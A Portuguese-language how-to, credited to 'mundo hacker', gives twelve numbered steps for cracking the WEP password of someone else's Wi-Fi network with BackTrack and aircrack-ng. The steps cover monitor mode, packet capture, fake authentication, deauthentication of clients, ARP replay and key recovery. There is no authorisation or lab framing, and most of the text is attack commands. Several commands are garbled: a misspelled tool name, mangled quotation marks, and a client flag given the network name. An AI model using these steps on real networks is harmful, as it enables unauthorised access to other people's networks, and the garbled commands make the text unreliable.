1) Com o seu BackTrack aberto abra o consele
2) Digite nessa tela “airmon-ng start wlan0? (isso mesmo com ZERO no final) e aguarde o comando ser executado.
3) Agora escreva “airodump-ng mon0?(com ZERO no final novamente). Com isso você vai encontrar todas as redes Wifi disponíveis próximas ao seu computador.
4) Guarde as seguintes informações da Rede wireless que você quer descobrir senha do Wifi:
• BSSID
• CH
• ESSID
5) Abra um novo console e digite “airodump-ng -c (CH DA REDE, CANAL) -w (NOME DA REDE) –bssid (BSSID da rede) mon0? (zero no final).Um exemplo ficaria “airdump-ng -c 1 -w dlink –bssid 00:24:50:A4:22:90 mon0?
6) Abra um novo console digite neste “aireplay-ng -1 0 -a (BSSID da rede) mon0?
7) Após ter digitado esse último comando, você precisará ter estabelecido uma conexão de sucesso com a rede que você quer conectar. Irá aparecer a seguinte mensagem “Autenthication succesful” Infelizmente isso é algo que acontece ao acaso, portanto se você não obteve essa mensagem, você precisará se desconectar do cliente utilizando o seguinte comando:
“ aireplay-ng –deauth10 -a (BSSID DA REDE) -c (NOME DA REDE) mon0?
8.) Após obter Authentication Succesful, você deve digitar o seguinte comando: “aireplay-ng -3 -b (BSSID da rede) mon0? (zero no final).
9) Esse comando vai começar a coletar os pacotes de dados que a rede wifi que você quer hackear está enviando.
Você vai precisar de pelo menos 20000 pacotes, sendo que quanto maior o número de pacotes maior sua chance e quanto mais rápido você os recebeu também aumenta sua chance.
10) Após conseguir pelo menos 20000 pacotes, abra um novo console kernel (Isso vai demorar MUITAS HORAS. AGUARDE COM PACIÊNCIA, pois se der errado vai ter que começar TUDO DE NOVO).
Digite neste: “aircrack-ng -b (BSSID da rede) (NOME_DA_REDE)-01.cap”
Note que tem que ter _ entre o nome da rede.
11) Aguarde pois o processo vai demorar MUITAS HORAS. Se der tudo certo, vai aparecer a seguinte mensagem:
“KEY FOUND! [ XX : XX : XX : XX : XX : XX: XX : XX : XX]“
“Decrypted correctly: 100%”
12) Agora é só remover os “:” e essa é a senha. Exemplo:
“KEY FOUND! [MU:ND:OH:AC:KE:R:]“
[by:mundo hacker]